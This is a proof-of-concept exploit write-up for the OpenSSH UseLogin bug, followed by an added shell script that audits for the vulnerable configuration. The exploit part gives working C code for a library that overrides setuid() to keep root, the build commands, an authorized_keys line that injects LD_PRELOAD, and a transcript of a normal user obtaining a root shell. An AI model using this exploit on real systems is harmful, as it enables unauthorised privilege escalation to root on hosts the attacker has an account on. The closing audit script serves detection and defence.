--[ OpenSSH UseLogin bug proof of concept exploit ]--

by [WaR] / http://www.genhex.org

--[ Intro ]--

I was very curious about finding out how to exploit this problem. Although I don't think anyone uses this feature, I looked into the matter anyway. Here it goes.

It was tested on the following platforms:

  - Slackware 7.1 with OpenSSH 3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)

The exploit should work as long as UseLogin does. YMMV.

This is based on libroot from squidge@onyx.infonexus.com, published a few years ago for exploiting the telnetd LD_PRELOAD bug (and you thought it wouldn't happen again...).

Kudos to pmsac@toxyn.org for his help figuring out the problem with the Slackware UseLogin, testing on OpenBSD, and giving the idea for the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

Create a lib.c file with the following content:

---8<---
#include <stdio.h>
#include <unistd.h>
/* Shadows libc's setuid(): login's drop to the target user never happens and
 * the effective uid is forced back to 0. Returning 0 tells login it worked. */
int setuid(uid_t uid) {
    printf("setuid() called...\n");
    seteuid(0);
    return 0;
}
---8<---

Compile it into a library:

  gcc -fPIC -c -o lib.o lib.c
  ld -shared -o libroot.so lib.o
  chmod 755 ./libroot.so

Now, for the tricky (*g*) part...

You must have an account on the machine, and create an entry in $HOME/.ssh/authorized_keys (or authorized_keys2) with:

  environment="LD_PRELOAD=/libroot.so"

(The path must point at wherever you put libroot.so; here it sits in the root directory.)

When sshd accepts your key, it exports this variable into the environment *BEFORE* running login. Because login is exec'd directly by the root sshd process rather than started as a setuid binary, the dynamic linker honours LD_PRELOAD and loads libroot.so ahead of libc. Somewhere after this, login executes a setuid() to drop to your uid; that call now lands in our wrapper, which does a seteuid(0) instead, so the shell login spawns runs with effective uid 0.

  $ id
  uid=1000(war) gid=100(users) groups=100(users)
  $ ssh war@localhost
  Enter passphrase for key '/home/war/.ssh/id_dsa':
  sh-2.04# id
  uid=0(root) gid=100(users) groups=100(users)

It also works remotely. Anyway, you _MUST_ have an account on the victim machine so you can set up the environment, and log in. And obviously (duh) it must have UseLogin enabled.

That's all.

shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR] "If you can't hack it, hit it with a hammer"
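As an added check, not part of [WaR]'s writeup, here is a small POSIX shell audit that looks for the two ingredients the technique combines: UseLogin enabled in sshd_config and an authorized_keys entry carrying environment="LD_PRELOAD=...". The sshd_config fragment and the key file it writes are constructed for the demonstration, and the key blob is a placeholder rather than a real key; the function names are my own.

```shell
#!/bin/sh
# Added audit helper (not part of the original writeup). Flags the combination
# the exploit relies on: "UseLogin yes" in sshd_config plus an authorized_keys
# entry carrying environment="LD_PRELOAD=...". Sample files are constructed.

# uselogin_enabled SSHD_CONFIG: succeeds if the first uncommented UseLogin
# directive says yes (sshd honours the first occurrence of a keyword).
uselogin_enabled() {
    val=$(grep -Ei '^[[:space:]]*UseLogin[[:space:]]+' "$1" \
          | head -n 1 | awk '{ print tolower($2) }')
    [ "$val" = "yes" ]
}

# preload_via_keys AUTHORIZED_KEYS: succeeds if any uncommented key line sets
# LD_PRELOAD through the environment= option.
preload_via_keys() {
    grep -Ev '^[[:space:]]*#' "$1" | grep -Eq 'environment="LD_PRELOAD='
}

# audit_uselogin_preload SSHD_CONFIG AUTHORIZED_KEYS
# Returns 0 when both ingredients are present (the setup described above),
# 1 when UseLogin is off, 2 when UseLogin is on but no LD_PRELOAD option is set.
audit_uselogin_preload() {
    cfg=$1
    keys=$2
    if ! uselogin_enabled "$cfg"; then
        echo "ok: UseLogin is not enabled, environment= options never reach login"
        return 1
    fi
    if preload_via_keys "$keys"; then
        echo "VULNERABLE: UseLogin yes and LD_PRELOAD set via $keys"
        return 0
    fi
    echo "warn: UseLogin yes in $cfg; no LD_PRELOAD option in $keys (yet)"
    return 2
}

# write_demo_files DIR: constructed sshd_config and authorized_keys mirroring
# the setup in the writeup. The key blob is a placeholder, not a real key.
write_demo_files() {
    cat > "$1/sshd_config" <<'EOF'
# constructed fragment
Port 22
UseLogin yes
EOF
    cat > "$1/authorized_keys" <<'EOF'
# constructed entry: option string as in the writeup, placeholder key blob
environment="LD_PRELOAD=/libroot.so" ssh-dss AAAAB3NzaC1kc3MAAAAPLACEHOLDER war@localhost
EOF
}

# Demo run on the constructed files.
demo() {
    d=$(mktemp -d) || return 1
    write_demo_files "$d"
    audit_uselogin_preload "$d/sshd_config" "$d/authorized_keys"
    rm -rf "$d"
    return 0
}
demo
```

Point the two functions at the real /etc/ssh/sshd_config and each user's ~/.ssh/authorized_keys (and authorized_keys2) on a host you administer; a return code of 0 is the exact configuration the session transcript above was produced on.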